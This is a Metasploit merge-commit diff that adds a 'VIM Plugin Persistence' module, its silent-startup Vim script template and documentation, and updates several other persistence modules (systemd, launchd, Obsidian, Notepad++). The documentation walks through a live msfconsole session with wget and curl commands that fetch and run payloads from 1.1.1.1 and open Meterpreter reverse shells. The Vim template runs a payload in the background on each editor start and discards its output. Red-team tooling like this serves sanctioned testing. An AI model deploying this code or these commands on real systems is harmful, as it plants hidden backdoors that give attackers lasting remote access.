Merge pull request rapid7#21206 from h00die/vim_plugin

vim plugin persistence

Author: dledda-r7

data/exploits/vim_plugin/plugin.vim

@@ -0,0 +1,11 @@
+" NAME.vim - Runs in the background on startup, discards output
+ 
+if !has('job') || exists('g:loaded_ZZWcUtfrDa')
+  finish
+endif
+let g:loaded_NAME = 1
+ 
+augroup NAME
+  autocmd!
+  autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
+augroup END

documentation/modules/exploit/linux/persistence/vim_plugin.md

@@ -0,0 +1,99 @@
+## Vulnerable Application
+
+This module creates a VIM Plugin which executes a payload on VIM startup.
+
+## Verification Steps
+
+1. Install the application if needed
+2. Start msfconsole
+3. Get a shell on a linux computer with vim installed
+4. Do: `use exploit/linux/persistence/vim_persistence`
+5. Do: `run`
+6. Start `vim` on the remote computer
+7. You should get a shell.
+
+## Options
+
+### NAME
+
+Name of the extension. Defaults to random.
+
+## Scenarios
+
+### vim 9.1.2141 on Kali 2026.1
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown
+msf exploit(multi/script/web_delivery) >
+[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer     : h00die-kali
+OS           : Debian  (Linux 6.18.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/vim_persistence) > set session 1
+session => 1
+msf exploit(linux/persistence/vim_persistence) > exploit
+[*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
+[*] Started reverse TCP handler on 1.1.1.1:4444
+msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[!] The service is running, but could not be validated. VIM is installed
+[*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc
+```
+
+Open vim
+
+```
+[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
+[*] Sending payload to 1.1.1.1 (curl/8.18.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400
+```

modules/exploits/linux/persistence/autostart.rb

@@ -89,7 +89,7 @@ def install_persistence
     user = target_user
     home = get_home_dir(user)
     vprint_status('Making sure the autostart directory exists')
-    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+    mkdir("#{home}/.config/autostart", cleanup: false) # in case no autostart exists
 
     name = datastore['BACKDOOR_NAME'] || Rex::Text.rand_text_alpha(5..8)
     path = "#{home}/.config/autostart/#{name}.desktop"

modules/exploits/linux/persistence/emacs_extension.rb

@@ -83,13 +83,13 @@ def install_persistence
       @clean_up_rc << "upload #{path} #{config_file}\n"
     else
       print_status("#{config_file} does not exist, creating it")
-      cmd_exec("mkdir #{emacs_dir}") unless directory?(emacs_dir) # don't use mkdir since that auto deletes on module finish
+      mkdir(emacs_dir, cleanup: false) unless directory?(emacs_dir)
       write_file(config_file, '')
       @clean_up_rc << "rm #{config_file}\n"
     end
 
     unless directory?(lisp_dir)
-      cmd_exec("mkdir #{lisp_dir}")
+      mkdir(lisp_dir, cleanup: false)
       @clean_up_rc << "rmdir #{lisp_dir}\n"
     end
 

modules/exploits/linux/persistence/init_systemd.rb

@@ -185,7 +185,7 @@ def systemd_user(backdoor_path, backdoor_file)
     user = target_user
     home = get_home_dir(user)
     vprint_status('Creating user service directory')
-    cmd_exec("mkdir -p #{home}/.config/systemd/user")
+    mkdir("#{home}/.config/systemd/user", cleanup: false)
 
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
     vprint_status("Writing service: #{service_name}")
@@ -196,7 +196,7 @@ def systemd_user(backdoor_path, backdoor_file)
     if !file_exist?(service_name)
       print_error('File not written, check permissions. Attempting secondary location')
       vprint_status('Creating user secondary service directory')
-      cmd_exec("mkdir -p #{home}/.local/share/systemd/user")
+      mkdir("#{home}/.local/share/systemd/user", cleanup: false)
 
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")

modules/exploits/linux/persistence/vim_plugin.rb

@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VIM Plugin Persistence',
+        'Description' => %q{
+          This module creates a VIM Plugin which executes a payload on VIM startup.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die',
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'References' => [
+          [ 'URL', 'https://vimways.org/2019/writing-vim-plugin/'],
+          [ 'URL', 'https://www.linode.com/docs/guides/writing-a-vim-plugin/'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
+        ],
+        'DisclosureDate' => '1991-11-03', # VIM release date
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('NAME', [ false, 'Name of the extension. Defaults to random'])
+    ]
+  end
+
+  def check
+    return CheckCode::Safe('VIM is required') unless command_exists?('vim')
+
+    CheckCode::Detected('VIM is installed')
+  end
+
+  def plugin_name
+    return datastore['NAME'] unless datastore['NAME'].empty?
+
+    Rex::Text.rand_text_alpha(5..10)
+  end
+
+  def get_home
+    return cmd_exec('echo ~').strip
+  end
+
+  def install_persistence
+    plugin = plugin_name
+    vim_plugin = File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'vim_plugin', 'plugin.vim'
+    ))
+    vim_plugin = vim_plugin.gsub('PAYLOAD_PLACEHOLDER', payload.encoded.gsub(';./', ';nohup ./')) # already run async
+    vim_plugin = vim_plugin.gsub('NAME', plugin)
+
+    path = "#{get_home}/.vim/plugin"
+    mkdir(path, cleanup: false) unless directory?(path)
+    path = "#{path}/#{plugin}.vim"
+    vprint_status("Writing plugin to #{path}")
+    unless write_file(path, vim_plugin)
+      fail_with(Failure::UnexpectedReply, "Failed to write VIM plugin to #{path}")
+    end
+    @clean_up_rc = "rm #{path}\n"
+  end
+end

modules/exploits/multi/persistence/obsidian_plugin.rb

@@ -220,12 +220,10 @@ def install_persistence
     fail_with(Failure::NotFound, 'No vaults found') if vaults.empty?
     vaults.each_value do |vault|
       print_status("Uploading plugin to vault #{vault['path']}")
-      # avoid mkdir function because that registers it for delete, and we don't want that for
-      # persistent modules
       if ['windows', 'win'].include? session.platform
-        cmd_exec("cmd.exe /c md \"#{vault['path']}\\.obsidian\\plugins\\#{plugin}\"")
+        mkdir("#{vault['path']}\\.obsidian\\plugins\\#{plugin}", cleanup: false)
       else
-        cmd_exec("mkdir -p '#{vault['path']}/.obsidian/plugins/#{plugin}/'")
+        mkdir("#{vault['path']}/.obsidian/plugins/#{plugin}", cleanup: false)
       end
       vprint_status("Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/main.js")
       write_file("#{vault['path']}/.obsidian/plugins/#{plugin}/main.js", main_js(plugin))

modules/exploits/multi/persistence/python_site_specific_hook.rb

@@ -98,7 +98,7 @@ def install_persistence
     print_status("Detected Python version #{@python_version}")
     get_hooks_path unless @hooks_path
 
-    mkdir(@hooks_path) if session.platform == 'osx' || session.platform == 'linux'
+    mkdir(@hooks_path, cleanup: false) if session.platform == 'osx' || session.platform == 'linux'
 
     fail_with(Failure::NotFound, "The hooks path #{@hooks_path} does not exists") unless directory?(@hooks_path)
     # check if hooks path writable

modules/exploits/osx/persistence/launch_plist.rb

@@ -105,7 +105,7 @@ def install_persistence
   # drops a LaunchAgent plist into the user's Library, which specifies to run backdoor_path
   def add_launchctl_item
     label = File.basename(backdoor_path)
-    cmd_exec("mkdir -p #{File.dirname(plist_path).shellescape}")
+    mkdir(File.dirname(plist_path).shellescape, cleanup: false) unless directory?(File.dirname(plist_path))
     # NOTE: the OnDemand key is the OSX < 10.4 equivalent of KeepAlive
     item = <<-EOF
     <?xml version="1.0" encoding="UTF-8"?>
@@ -186,7 +186,7 @@ def user
   # @param [String] exe the executable to drop
   def write_backdoor(exe)
     print_status('Dropping backdoor executable...')
-    cmd_exec("mkdir -p #{File.dirname(backdoor_path).shellescape}")
+    mkdir(File.dirname(backdoor_path).shellescape, cleanup: false) unless directory?(File.dirname(backdoor_path))
 
     if write_file(backdoor_path, exe)
       print_good("Backdoor stored to #{backdoor_path}")

modules/exploits/windows/persistence/notepadpp_plugin.rb

@@ -84,7 +84,7 @@ def install_persistence
     if session.type == 'meterpreter'
       fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless session.fs.dir.mkdir(payload_pathname)
     else
-      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless cmd_exec("mkdir \"#{payload_pathname}\"")
+      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless mkdir(payload_pathname, cleanup: false)
     end
 
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + payload_name + '.dll', payload_exe)